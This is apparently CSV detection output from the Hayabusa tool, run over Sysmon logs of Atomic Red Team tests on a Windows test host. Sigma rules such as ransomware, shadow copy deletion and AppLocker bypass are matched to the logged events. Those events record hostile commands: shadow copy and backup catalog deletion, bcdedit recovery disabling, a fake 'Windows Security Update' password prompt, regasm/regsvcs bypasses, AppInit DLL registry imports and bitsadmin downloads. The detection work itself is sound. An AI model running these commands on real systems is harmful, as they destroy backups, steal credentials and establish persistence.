Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup 
Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll : Path: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 
+09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe delete shadows /all /quiet : Path: C:\Windows\System32\vssadmin.exe 
: User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe delete catalog -quiet : Path: C:\Windows\System32\wbadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog 
-quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe"" : Path: C:\Windows\System32\wbengine.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe : Path: C:\Windows\System32\vds.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy 
ignoreallfailures"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} recoveryenabled no : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled 
no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /create AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md 
